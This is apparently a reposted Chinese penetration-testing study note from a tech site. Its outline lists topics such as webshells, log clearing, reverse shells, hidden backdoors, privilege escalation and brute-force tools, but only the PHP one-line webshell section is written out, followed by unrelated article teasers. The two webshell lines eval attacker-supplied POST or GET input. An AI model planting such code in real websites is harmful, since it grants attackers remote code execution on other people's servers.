學習筆記記錄

目錄

windows

php一句話木馬

日志清理

DOS命令

查看用戶的SID

最高權限

常見的cmd命令

反彈shell

PHPMYadmin

mysql注入語句

wmic

linux

crontab創建隱藏后門

linux日志文件

knockd服務

ssh登錄

ssh隧道

本地轉發

遠程轉發

動態轉發

/proc:

Centos 8 更新 yum 源

痕跡清理技巧

隱身ssh登錄系統

docker

設置倉庫

Docker 更換國內鏡像源

密碼信息

內核提權

查看發行版

查看內核版本

一句話添加用戶

獲取臨時shell

設置受限制shell

繞過受限的shell

可提權文件

輔助提權工具

git提權

清理磁盤

df

du

查看可執行的命令

系統信息

查看系統是32位還是64位

查看內核信息

查看開機啟動

計劃任務

特殊權限

環境變量

查看ssh日志信息

查找特殊權限賬號(默認root)

查找可以登錄ssh的賬號

查看正在連接的ssh sessions

抓包

teehee提權

find

提權

按權限查找

按所有者查找

按時間查找

按大小查找文件

grep

mysql暴力破解

查看登錄錯誤的用戶名

查看登錄錯誤用戶名及ip登錄次數

kali

crunch

john破解zip加密文件

nmap

常用

腳本掃描

hydra

ssh:22

Ftp:21

https

smb

rdp:3389

pop3

sqlmap

Access注入

MySQL數據庫注入

Cookie注入

POST表單注入

繞過WAF防火墻

meterpreter

端口轉發

設置監聽

亂碼

常用基本系統命令

文件命令

獲取系統信息

用戶界面

權限

hashdump

利用

內網滲透

維持訪問(種植后門)

第三種shift后門

常用

msf

msfvenom

WMAP(輕量級測試工具,檢測常見的Web漏洞)

NDProxy內核提權


免責聲明

文章僅做經驗分享用途,切勿當真,未授權的攻擊屬于非法行為!利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任,一旦造成后果請自行承擔!!!

windows

php一句話木馬
<?php eval(@$_POST['a']);?>
<?php eval(@$_GET['a']);?>
其中eval

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/162312.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/162312.shtml
英文地址,請注明出處:http://en.pswp.cn/news/162312.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

CentOS 7 使用cJSON 庫

什么是JSON JSON是一種輕量級的數據交換格式&#xff0c;可讀性強、編寫簡單。鍵值對組合編寫規則&#xff0c;鍵名使用雙引號包裹&#xff0c;冒號&#xff1a;分隔符后面緊跟著數值&#xff0c;有兩種常用的數據類型是對象和數組。 對象&#xff1a;使用花括號{}包裹起來的…

【Rxjava詳解】(三)更好實踐異步請求

本文為更像demo的總結&#xff0c;在實際開發中&#xff0c;利用rxjava采取異步請求在一些簡單的單純請求數據上面&#xff0c;會顯得沒有必要&#xff0c;但rxjava提供的思路&#xff0c;在后期不論是增加功能&#xff0c;還是說整體代碼的工整度&#xff0c;都能感受到開發的…

補充:自動化測試高級應用之python多線程的使用-新方法

前段時間在網上學習多線程跑用例的時,發現一種更簡潔,優雅的使用多線程的方法,在此分享給大家。 閱讀本文前,請先閱讀前面寫的多線程跑用例的文章:【精選】第七章 第四節 自動化測試高級應用之python多線程的使用_add_test_img-CSDN博客 本文新的方法,對原有的run_al…

接口傳參數list的時候,items里面放個???????list

item里面放個list 先定義一個 list&#xff0c;循環add加入參數

java之switch case的用法

java之switch case的用法 Java中的switch語句是一種多路選擇結構&#xff0c;它允許一個變量在其值的多個可能選項之間進行選擇。這種結構可以替代一系列嵌套的if-else語句&#xff0c;使代碼更清晰和簡潔。 下面是switch語句的基本語法&#xff1a; switch (expression) { …

android keylayout鍵值適配

1、通過getevent打印查看當前keyevent數字對應事件和物理碼 2、dumpsys input 查看輸入事件對應的 KeyLayoutFile: /system/usr/keylayout/Vendor_6080_Product_8060.kl 3、通過物理碼修改鍵值映射&#xff0c;修改/system/usr/keylayout/目錄下的文件

CuratorFramework的blockUntilConnected方法

CuratorFramework是一個ZooKeeper客戶端庫&#xff0c;它提供了一些用于處理ZooKeeper連接和節點操作的高級API。其中&#xff0c;blockUntilConnected方法是一個阻塞方法&#xff0c;它會一直阻塞直到客戶端成功連接到ZooKeeper服務器。 具體來說&#xff0c;blockUntilConne…

(三)、基于 LangChain 實現大模型應用程序開發 | 模型鏈 Chains

&#x1f604; 為什么我們需要Chains &#xff1f; 鏈允許我們將多個組件組合在一起&#xff0c;以創建一個單一的、連貫的應用程序。鏈&#xff08;Chains&#xff09;通常將一個LLM&#xff08;大語言模型&#xff09;與提示結合在一起&#xff0c;使用這個構建塊&#xff0…

永久免費!N個excel表一鍵合并成一個表(excel表格合并技巧)

您是否還在用手工復制粘貼來將多個EXCEL或表的數據合并到一個表里&#xff1f;那就太麻煩&#xff0c;效率太低了&#xff0c;用金鳴表格文字識別的“表格合并”功能&#xff0c;可免費將N個excel文件或N個excel表一鍵合并到一個表里面&#xff0c;而且這個功能永久免費&#x…

【C++】特殊類設計 {不能被拷貝的類;只能在堆上創建的類;只能在棧上創建的類;不能被繼承的類;單例模式:懶漢模式,餓漢模式}

一、不能被拷貝的類 設計思路&#xff1a; 拷貝只會發生在兩個場景中&#xff1a;拷貝構造和賦值重載&#xff0c;因此想要讓一個類禁止拷貝&#xff0c;只需讓該類不能調用拷貝構造以及賦值重載即可。 C98方案&#xff1a; 將拷貝構造與賦值重載只聲明不定義&#xff0c;并…

FDG6306P PowerTrench? MOSFET P溝道 特點及其應用詳解

關于PowerTrench MOSFET&#xff1f; 它是一種MOS場效應晶體管&#xff0c;可以提高系統效率和功率密度。該技術采用了屏蔽柵極技術&#xff0c;可以減少開關損耗和導通損耗&#xff0c;從而提高了系統效率。此外&#xff0c;PowerTrench MOSFET還具有低導通電阻和高開關速度的…

三角洲雜志三角洲雜志社三角洲編輯部2023年第19期目錄

作家在線 李明聰 把寫作當成一種享受 李明聰; 2 頭條作品 冬天的童話 王排; 5-7 迎來春色換人間 王排; 8《三角洲》投稿&#xff1a;cnqikantg126.com 小說精選 鋼哥 曹茂炯; 9-25 重逢 莫艷陽; 26 散文現場 孩子&#xff0c;你相信光嗎&#xff1f; 趙…

前端js語音朗讀文本

<!DOCTYPE html> <html lang"zh"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>語音朗讀</title></head><body>&l…

如何滿足BMW EDI項目的PKT需求?

近期寶馬BMW&#xff08;以下簡稱BMW&#xff09;在其部分供應商之間試點推進PKT項目&#xff0c;BMW為什么要啟動 PKT 計劃呢&#xff1f; 業務系統全面升級統一全球所有寶馬工廠的流程 寶馬內部的物流供貨流程 近期BMW PKT需求主要針對其內部物流供貨流程展開&#xff1a; …

嵌入式開發--賽普拉斯cypress的鐵電存儲器FM25CL64B

嵌入式開發–賽普拉斯cypress的鐵電存儲器FM25CL64B 簡介 FM25CL64B是賽普拉斯cypress出品的一款鐵電存儲器&#xff0c;這種存儲器最大的優勢是可以像RAM一樣隨機存儲&#xff0c;和按字節寫入&#xff0c;也可以像ROM一樣掉電仍然可以保存數據&#xff0c;是一種相當優秀的…

Redis 持久化機制

client Redis[內存] --> 內存數據、磁盤數據----> 磁盤&#xff0c;Redis官方提供了兩種不同的持久化方案將內存中的數據存儲在硬盤中&#xff1a; 快照&#xff08;Snapshot&#xff09; AOF只追加日志文件。 1、快照&#xff08;Snapshot&#xff09; 1、快照的特點…

如何用CHAT解釋文章含義?

問CHAT&#xff1a;解釋“ 本身樂善好施&#xff0c;令名遠近共欽&#xff0c;待等二十左右&#xff0c;定有高親可攀&#xff1b;而且四德俱備&#xff0c;幫夫之緣亦有。主持家事不紊&#xff0c;上下亦無閑言。但四十交進&#xff0c;家內謹防口舌&#xff0c;須安家堂&…

分布式篇---第一篇

系列文章目錄 文章目錄 系列文章目錄前言一、分布式冪等性如何設計?二、簡單一次完整的 HTTP 請求所經歷的步驟?三、說說你對分布式事務的了解前言 前些天發現了一個巨牛的人工智能學習網站,通俗易懂,風趣幽默,忍不住分享一下給大家。點擊跳轉到網站,這篇文章男女通用,…

非遺之光:十八數藏柏松數字保護的璀璨之路

隨著數字技術的崛起&#xff0c;非物質文化遺產的保護進入了一個新的紀元。在這個時代的先鋒中&#xff0c;十八數藏以其對傳統工藝的數字保護而獨領風騷。這是一條璀璨之路&#xff0c;通過數字技術的應用&#xff0c;為傳統工藝注入了新的活力。 十八數藏柏松將數字創新融入傳…

軟件包管理器yum和git

目錄 一、Linux軟件包管理器yum 1、Linux下的軟件安裝方法 2、了解yum 1、實際例子引入 2、yum 3、查找軟件包 4、安裝軟件包 5、卸載軟件 二、git 一、Linux軟件包管理器yum 1、Linux下的軟件安裝方法 1、在Linux下安裝軟件&#xff0c;一個通常的辦法是下載到程序的源…